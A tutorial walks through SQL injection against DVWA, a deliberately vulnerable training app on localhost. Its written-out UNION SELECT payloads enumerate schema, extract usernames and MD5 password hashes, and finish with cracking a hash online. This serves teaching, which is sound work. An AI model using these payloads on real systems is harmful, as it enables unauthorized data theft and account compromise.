SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
In a 2012 study, it was observed that the average web application received 4 attack campaigns per month, and retailers received twice as many attacks as other industries.
Form
SQL injection (SQLI) was considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project.
In 2013, SQLI was rated the number one attack on the OWASP top ten.
There are four main sub-classes of SQL injection:
• Classic SQL injection
• Blind or Inference SQL injection
• Database management system-specific SQL injection
• Compounded SQL injection
o SQL injection + insufficient authentication [7]
o SQL injection + DDoS attacks [8]
o SQL injection + DNS hijacking [9]
o SQL injection + XSS [10]
• The Storm Worm is one representation of Compounded SQL injection.
Here I will implement SQL-injection in DVWA (damn vulnerable web application) with low security.
Implementation
Step 1: — Configure DVWA (Damn vulnerable web application) to your local host (127.0.0.1).
Step 2: — Open DVWA in your browser by typing 127.0.0.1/DVWA/login.php
Step 3: — Set your DVWA security to low.
Step 4: — Now go to sql injection and perform the practical.
Step 5: — Input 1 into the Text Box and click Submit Button. Webpage is supposed to print ID, First Name and Surname.
And you can see the URL in above picture is,
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#
Now in above URL we will try to unbalance sql query by placing a ‘ after 1 like this,
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’&Submit=Submit#
And Web page is supposed to throw an error. If it doses then we can say that it is vulnerable. Like this,
Step 6: — Now will find out how many columns does it contains by using “order by” keyword.
Your URL will be look like,
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’ order by 1 — &Submit=Submit#
We will continue increasing the number by 1, 2, 3,….N until we get an error. In our case we will get an error at “order by 3 — “. Like this,
It means that it contains 2 columns.
Step 7: — Now that we have figured it out that we have 2 vulnerable columns we will use UNION SELECT statement over here to find out database name and its version. Like this,
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’ union select database(),version() — &Submit=Submit#
And the output will be,
We can see that the database name is “dvwa” and version is “10.3.22-MariaDB-1”.
Step 8: — Now we will extract out all the table names from this database by firing following query.
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’ union select ‘abc’,table_name from information_schema.tables — &Submit=Submit#
And output will be,
Note: Information schema contains metadata for all data objects stored in that particular database. So, we use above Query to Extract All Table’s Name.
Step 9: — As we can see in above picture that we have presented with all the tables name that database contains. But we are not interested in all the tables, we will be possibly looking for a table that might contain username and password. So, we will be scrolling through all the tables.
As we can see in above picture that we have found a table named as “users”. This table might contain the information that we are looking for. So, now will try to get information from that table.
Step 10: — Now we will be firing a query that will extract the information from table named “users”. And the query will be,
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’ union select ‘abc’,column_name from information_schema.tables where table_columns=users — &Submit=Submit#
As soon as you will fire this query web page will through an error like “unknown column ‘users’ in ‘where clause’”. This is because we can not directly use table name in it. But we have to convert that table name into decimal value. Like in our case it will be,
Text = users
Decimal = 117 115 101 114 115
We have to use like (117,115,101,114,115)
So, our final query will be look something this,
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’ union select ‘abc’,column_name from information_schema.columns where table_name=char(117,115,101,114,115) — &Submit=Submit#
And our output will be,
And we can see in above picture that we have extracted out all the columns name from the users table.
Step 11: — Now we want user name and password and we can see in above picture that it contains column name “user” and “password”. So, now will get all user name and password by firing this simple query.
127.0.0.1/DVWA/vulnerabilities/sqli/?id=1’ union select user,password from users — &Submit=Submit#
And the output will be,
There we go, we have extracted usernames and passwords. But we can see that passwords are not in pure text form instead it is in MD5 hash format. We can easily decrypt it using online MD5 decrypter.
I will be using https://www.md5online.org/md5-decrypt.html this tool to decrypt those password hashes.
As you can see that I have decrypted a hash and we got the actual password which is “abc123”.
